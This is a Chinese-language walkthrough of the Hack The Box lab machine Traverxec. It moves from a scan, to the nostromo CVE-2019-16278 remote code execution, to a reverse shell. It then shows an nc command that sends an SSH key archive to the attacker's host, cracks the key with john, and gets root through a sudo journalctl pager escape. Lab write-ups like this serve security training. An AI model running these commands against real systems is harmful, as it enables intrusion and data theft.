目錄
簡介
這個靶機還算比較簡單,只需一步一步慢慢走下去就可以完成了。漏洞發現和利用都比較簡單,使用已知漏洞可以直接獲得web服務權限的shell,唯一有點難度的可能就是沒注意到public_www目錄(畢竟只賦予了執行權限,使用ls發現不了),從而獲取不到ssh連接的密鑰,也可能獲取到了ssh連接密鑰發現還是需要輸入密碼,而不知道如何破解(畢竟對john不熟悉很難知道還有ssh2john.py這樣的腳本)。總之,當你看完的時候你就知道多簡單了。
信息收集
使用nmap -sS 10.10.10.165掃描常用端口,如圖:
訪問Web服務,發現網頁有輸入框,然後測試是否存在SQL注入漏洞,發現不存在。然後使用Burp Suite截取數據包,並重放,如圖:
發現一個服務器banner信息,這個banner我還沒見過,然後搜索一波:
漏洞發現
發現nostromo 1.9.6存在已知的遠程代碼執行漏洞 ,漏洞編號爲:CVE-2019-16278,然後找了exp:https://github.com/sudohyak/exploit/blob/master/CVE-2019-16278/exploit.py進行驗證,發現可以成功執行命令,如圖:
漏洞利用
在本機使用nc開啓端口監聽:nc -lvp 4444,然後執行如下命令進行反彈shell:
執行完之後會看到本地已經建立連接,輸入命令測試如圖:
web-data用戶權限較低,無法查看user.txt,因此查看/etc/passwd文件,發現存在一個uid爲1000的賬戶,如圖:
然後進入/home/david目錄搜索信息,結果沒發現信息,然後查看一下/var目錄下的文件,然後在/var/nostromo/conf下發現如下信息:
然後查看htpasswd文件,發現是加密的(密碼域密文由三部分組成的,即:$id$salt$encrypted。【注】:id爲1時,採用md5進行加密;id爲5時,採用SHA256進行加密;id爲6時,採用SHA512進行加密。),破解密碼要錢,然後繼續尋找其他線索,如圖:
然後使用路徑穿越漏洞嘗試進行下載,如圖:
發現需要密碼,剛剛找到的htpasswd文件中字符串應該就是加密的密碼,然後嘗試使用nc進行文件傳輸,新打開一個終端,輸入命令:nc -lvp 8888 >backup-ssh-identity-files.tgz,然後在反彈回來的shell中執行:nc 10.10.14.45 8888 <backup-ssh-identity-files.tgz,解壓發現是ssh的密鑰文件, 嘗試使用ssh [email protected] -i id_rsa登錄,發現還是需要輸入密碼。
使用john工具中的ssh2john.py將id_rsa文件轉爲john可以識別的文件,然後使用john進行解密,如圖:
然後使用id_rsa和密碼成功登錄遠程系統,如圖:
權限提升
-
內核提權
查看系統內核版本,如圖:
嘗試使用CVE-2019-13272進行提權,如圖:
由於沒有權限執行pkexec或者不存在導致無法提權成功。
-
SUID提權
使用find / -perm -u=s -type f 2>/dev/null、find / -user root -perm -4000 -print 2>/dev/null或find / -user root -perm -4000 -exec ls -ldb {} \;查看具有root權限的程序,如圖:
沒有常見的find、bash、vim、cp、nano、less和more等。然後發現有個bin目錄還沒看看,然後查看bin目錄下的文件,其中server-stats.sh文件內容如圖:
文件最後一行使用sudo執行了/usr/bin/journalctl命令,這或許是作者有意的提示吧。然後執行/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/less,輸入!sh,如圖:
未獲得root權限的shell(後來纔想到less並不是以sudo權限執行的,我真傻),接着嘗試 執行usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service,如圖:
原來journalctl命令和less、more差不多,都不會直接顯示完(之前完全不知道journalctl命令),嘗試輸入!sh,如圖:
成功提升爲root權限。
總結
本文記錄了對Hack The Box::Traverxec靶機的完整滲透測試流程。靶機較簡單,但對於剛入門或經驗不足的人來說可能也有點難度,主要是從www-data用戶到普通用戶這裏可能並不能很快注意到public_www目錄,即便使用ls -la在沒有發現其他目錄的情況下可能會束手無策,又或者提權經驗不足卡在那裏。總之,在做Hack The Box靶機的時候,很多時候作者都給足了提示,只要細心細心在細心,一定能獲得root權限。